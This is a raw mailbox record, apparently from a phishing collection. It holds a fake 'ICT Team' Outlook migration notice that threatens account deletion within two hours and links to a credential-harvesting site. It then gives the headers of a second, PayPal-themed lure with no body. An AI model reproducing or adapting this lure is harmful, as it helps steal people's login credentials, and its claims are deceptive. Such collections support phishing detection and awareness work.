From: Mujeeb Abdullah <Mujeeb.Abdullah@doosan.com>
To: Mujeeb Abdullah <Mujeeb.Abdullah@doosan.com>
Subject: RE: INCIDENT CASE NO: 00297
Thread-Topic: INCIDENT CASE NO: 00297
Thread-Index: AdJ7B8B7rg9L99exQoKMhHJanJTeDwABegiH
Importance: high
X-Priority: 1
Date: Mon, 30 Jan 2017 15:33:49 +0000
Message-ID: <6065A6947DB289418A2D054117643AD27EBFD39A@EUMXA04.corp.doosan.com>
References: <6065A6947DB289418A2D054117643AD27EBD4D5A@EUMXA04.corp.doosan.com>
In-Reply-To: <6065A6947DB289418A2D054117643AD27EBD4D5A@EUMXA04.corp.doosan.com>
Accept-Language: en-US, en-GB
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [10.31.144.29]
Content-Type: multipart/alternative;
	boundary="_000_6065A6947DB289418A2D054117643AD27EBFD39AEUMXA04corpdoos_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 41

--_000_6065A6947DB289418A2D054117643AD27EBFD39AEUMXA04corpdoos_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




INCIDENT CASE

    We are migrating all  email accounts into  Outlook Web App 2017 and as =
such all active Account Holder are to verify and Log in for the upgrade and=
 migration to take effect now. This is done to improve the security and eff=
iciency due to recent spam mails received. Any email users that ignore this=
 notification will automatically be deleted from our mail server within the=
 period of 2 Hours after receiving this notification alert.

Click MAIL SERVER 2017<http://outlookreset.azurewebsites.net/>   to migrate=
 and block further Spam mails within 2 hours.

Regards,
ICT Team,
Outlook Services for All Users
Outlook Web App 2017





















































































































































































--_000_6065A6947DB289418A2D054117643AD27EBFD39AEUMXA04corpdoos_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style type=3D"text/css" id=3D"owaParaStyle">=0A=
<!--=0A=
p=0A=
	{margin-top:0;=0A=
	margin-bottom:0}=0A=
-->=0A=
</style>
</head>
<body fpstyle=3D"1" ocsi=3D"0">
<div style=3D"direction: ltr;font-family: Tahoma;color: #000000;font-size: =
10pt;"><br>
<div style=3D"font-family: Times New Roman; color: #000000; font-size: 16px=
">
<div id=3D"divRpF708020" style=3D"direction: ltr;"><font face=3D"Tahoma" si=
ze=3D"2" color=3D"#000000"><br>
</font><br>
</div>
<div></div>
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<div style=3D"font-size:13.3333px; background-color:white"><font face=3D"Ca=
libri,Arial,Helvetica,sans-serif" size=3D"2"><span style=3D"font-size:16px"=
><font color=3D"#757B80" face=3D"Arial,sans-serif" size=3D"2"><span style=
=3D"font-size:10pt">INCIDENT CASE</span></font><font color=3D"#F24B14" face=
=3D"Arial,sans-serif" size=3D"5"><span style=3D"font-size:29px"><br>
</span></font></span></font></div>
<div style=3D"font-size:13.3333px; background-color:white"><font face=3D"Ar=
ial,sans-serif"><font color=3D"#757B80"><br>
</font><font color=3D"#757B80">&nbsp; &nbsp; We are migrating all&nbsp; ema=
il accounts into&nbsp; Outlook Web App 2017 and as such all active&nbsp;Acc=
ount Holder&nbsp;are to verify and Log in for the upgrade and migration to =
take effect now. This is done to improve the security and efficiency
 due to recent spam mails received. Any email users that ignore this notifi=
cation will automatically be deleted from our mail server within the period=
 of 2 Hours after receiving this notification alert.</font><font color=3D"#=
757B80"><br>
</font></font></div>
<div style=3D"font-size:13.3333px; background-color:white"><font color=3D"#=
444444" face=3D"Arial,sans-serif" size=3D"1"><span style=3D"font-size:13px"=
><font color=3D"#AC193D" size=3D"2"><span style=3D"font-size:10pt"><br>
</span></font><font color=3D"#757B80" size=3D"2"><span style=3D"font-size:1=
0pt">Click</span></font><font color=3D"#757B80" size=3D"2"><span style=3D"f=
ont-size:10pt">&nbsp;</span></font><a href=3D"http://outlookreset.azurewebs=
ites.net/" target=3D"_blank"><font size=3D"2"><span style=3D"font-size:10pt=
">MAIL
 SERVER 2017</span></font></a><font color=3D"#757B80" size=3D"2"><span styl=
e=3D"font-size:10pt"><font color=3D"#444444">&nbsp;&nbsp;
</font>to migrate and block further Spam mails within 2 hours.</span></font=
><font color=3D"#222222"><br>
</font><font color=3D"black" size=3D"2"><span style=3D"font-size:10pt"><b><=
br>
</b></span></font><font color=3D"#757B80" size=3D"2"><span style=3D"font-si=
ze:10pt">Regards,</span></font><font color=3D"#AC193D" size=3D"1"><br>
</font><font color=3D"#757B80" size=3D"2"><span style=3D"font-size:10pt">IC=
T&nbsp;Team,</span></font><font color=3D"#AC193D" size=3D"1"><br>
</font><font color=3D"#757B80" size=3D"2"><span style=3D"font-size:10pt">Ou=
tlook Services for All Users</span></font></span></font></div>
<div style=3D"font-size:13.3333px; background-color:white"><font color=3D"#=
444444" face=3D"Arial,sans-serif" size=3D"1"><span style=3D"font-size:13px"=
><font color=3D"#757B80" face=3D"Arial,sans-serif" size=3D"1"><span style=
=3D"font-size:13.32px">Outlook Web App 2017</span></font></span></font></di=
v>
</div>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</div>
</div>
</div>
</div>
</body>
</html>

--_000_6065A6947DB289418A2D054117643AD27EBFD39AEUMXA04corpdoos_--

From jose@monkey.org Tue Jan 31 01:01:27 2017 +0000
Return-Path: downtown@vps1.infrontoftheline.net
Delivered-To: jose@monkey.org
X-FDA: 72462590214.22.spoon00_46efb4228872f
X-Spam-Summary: 58,3.5,0,faa9e1e49a8a426e,d41d8cd98f00b204,downtown@vps1.infrontoftheline.net,:,RULES_HIT:41:72:355:375:379:559:967:983:988:989:1026:1208:1224:1260:1263:1313:1345:1381:1431:1433:1434:1437:1516:1517:1520:1534:1542:1559:1571:1593:1594:1619:1620:1699:1711:1714:1730:1747:1777:1792:1801:1803:2198:2199:2393:2525:2549:2553:2560:2563:2682:2685:2828:2859:2890:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3024:3138:3139:3140:3141:3142:3148:3245:3865:3866:3868:3870:3872:3873:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:3991:4000:4042:4605:5007:6096:6238:6261:6650:6669:6678:6688:7901:8518:8568:8603:9025:9040:9080:9388:9416:9908:10004:10049:10167:10168:10231:10346:10400:10881:11256:11257:11639:11651:11657:11658:11914:12043:12555:12891:12903:12955:12958:12959:12967:12968:13139:13255:13439:14093:14096:14129:14181:14208:14659:14721:14828:14829:14846:21080:21094:21162:21323:21433:21450:21451:21524:30001:30054:30055:30069:30070:30090,0,RBL:216.129.207.176:@vps1.infro
X-HE-Tag: spoon00_46efb4228872f
X-Filterd-Recvd-Size: 3962
Received: from vps1.infrontoftheline.net (vps1.infrontoftheline.net [216.129.207.176])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 31 Jan 2017 01:01:27 +0000 (UTC)
Received: from downtown by vps1.infrontoftheline.net with local (Exim 4.87)
	(envelope-from <downtown@vps1.infrontoftheline.net>)
	id 1cYMp4-0002Un-P9
	for jose@monkey.org; Mon, 30 Jan 2017 20:01:26 -0500
To: jose@monkey.org
Subject: Check Your Recent Activity By Logging in your Account . ✔ #PP = 74645222236611408
